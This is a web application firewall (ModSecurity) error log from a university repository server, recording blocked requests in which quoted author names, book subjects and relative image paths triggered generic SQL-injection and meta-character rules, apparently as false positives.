[Mon Aug 28 07:53:38.860561 2023] [:error] [pid 38059] [client 47.128.19.144] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Fiscal_and_Monetary_Policy_in_the_Eurozone.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvwEsCo-f0AAJSr2hgAAAAO"]
[Mon Aug 28 08:04:11.118139 2023] [:error] [pid 38075] [client 47.128.21.134] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Visual_six_sigma.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOvyi8Co-f0AAJS7R2QAAAAB"]
[Mon Aug 28 08:07:12.181032 2023] [:error] [pid 38059] [client 47.128.27.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sotiropoulos, Dionisios N\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOvzQMCo-f0AAJSr2rMAAAAO"]
[Mon Aug 28 08:12:31.468709 2023] [:error] [pid 38196] [client 47.128.29.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Furht, Borko\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv0f8Co-f0AAJU0qcoAAAAD"]
[Mon Aug 28 08:19:10.887573 2023] [:error] [pid 38338] [client 47.128.16.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Internet in public administration\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv2DsCo-f0AAJXCvscAAAAJ"]
[Mon Aug 28 08:19:57.939418 2023] [:error] [pid 38387] [client 47.128.29.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22READ,FASTER,RECALL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv2PcCo-f0AAJXz2oIAAAAQ"]
[Mon Aug 28 08:20:09.628666 2023] [:error] [pid 38386] [client 47.128.26.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22RULLY FEROZA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv2ScCo-f0AAJXyN34AAAAM"]
[Mon Aug 28 08:27:39.397745 2023] [:error] [pid 38149] [client 40.77.167.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//4. BAB V - DAFTAR PUSTAKA RESA.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOv4C8Co-f0AAJUFNeYAAAAA"]
[Mon Aug 28 08:33:33.575262 2023] [:error] [pid 37539] [client 47.128.27.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Dewi Hudiyah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv5bcCo-f0AAJKjaMsAAAAG"]
[Mon Aug 28 08:39:05.235051 2023] [:error] [pid 38114] [client 47.128.24.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22VOSS, CHRIS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv6ucCo-f0AAJTioR0AAAAE"]
[Mon Aug 28 08:42:28.455418 2023] [:error] [pid 38539] [client 47.128.19.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Financial Service\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv7hMCo-f0AAJaL2SgAAAAG"]
[Mon Aug 28 08:42:28.631261 2023] [:error] [pid 38539] [client 47.128.19.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Financial Service\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv7hMCo-f0AAJaL2SkAAAAG"]
[Mon Aug 28 08:47:42.580804 2023] [:error] [pid 38686] [client 47.128.26.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Pinkard, Becky\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv8vsCo-f0AAJceGI8AAAAA"]
[Mon Aug 28 08:49:44.851322 2023] [:error] [pid 38303] [client 47.128.18.151] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_-_The_Logistics_Handbook_A_Practical_Guide_for_Supply_Chain_(_PDFDrive_).png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOv9OMCo-f0AAJWfaF0AAAAI"]
[Mon Aug 28 08:50:00.277501 2023] [:error] [pid 38641] [client 47.128.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22LIFE, SECRETS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv9SMCo-f0AAJbxo@gAAAAJ"]
[Mon Aug 28 08:50:56.902576 2023] [:error] [pid 38687] [client 47.128.31.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22\\x22 found within ARGS:author: \\x22\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv9gMCo-f0AAJcfLKEAAAAC"]
[Mon Aug 28 08:52:46.420396 2023] [:error] [pid 38683] [client 47.128.27.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Project Management Institute\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv97sCo-f0AAJcb49QAAAAP"]
[Mon Aug 28 08:53:46.923816 2023] [:error] [pid 38690] [client 47.128.30.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/The_Smart_City_in_a_Digital_World.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOv@KsCo-f0AAJciCucAAAAG"]
[Mon Aug 28 08:58:03.288233 2023] [:error] [pid 38646] [client 47.128.17.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EMERGING ISSUES IN ISLAMIC FINANCE LAW AND PRACTIC\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv-K8Co-f0AAJb21FQAAAAB"]
[Mon Aug 28 08:58:18.155440 2023] [:error] [pid 38688] [client 47.128.23.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hawamdeh, Suliman\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv-OsCo-f0AAJcg6e4AAAAD"]
[Mon Aug 28 09:01:07.683678 2023] [:error] [pid 38769] [client 47.128.28.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22TAUFIK ARRAHMAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOv-48Co-f0AAJdxrTAAAAAS"]
[Mon Aug 28 09:14:23.446139 2023] [:error] [pid 39216] [client 47.128.23.177] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HARDIYANTO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwC-8Co-f0AAJkwQPQAAAAV"]
[Mon Aug 28 09:14:59.381329 2023] [:error] [pid 39206] [client 47.128.19.221] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Develop_your_leadership_skills.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwDI8Co-f0AAJkmjzsAAAAH"]
[Mon Aug 28 09:20:35.991858 2023] [:error] [pid 39321] [client 47.128.24.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Packowski, Josef\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwEc8Co-f0AAJmZgDMAAAAC"]
[Mon Aug 28 09:31:28.813719 2023] [:error] [pid 39434] [client 47.128.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Decision Makers\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwHAMCo-f0AAJoKe7IAAAAC"]
[Mon Aug 28 09:39:09.770798 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwIzcCo-f0AAJqS024AAAAP"]
[Mon Aug 28 09:39:11.457424 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwIz8Co-f0AAJqS028AAAAP"]
[Mon Aug 28 09:39:12.410168 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI0MCo-f0AAJqS03AAAAAP"]
[Mon Aug 28 09:39:14.930743 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI0sCo-f0AAJqS03EAAAAP"]
[Mon Aug 28 09:39:18.970254 2023] [:error] [pid 39570] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwI1sCo-f0AAJqS03IAAAAP"]
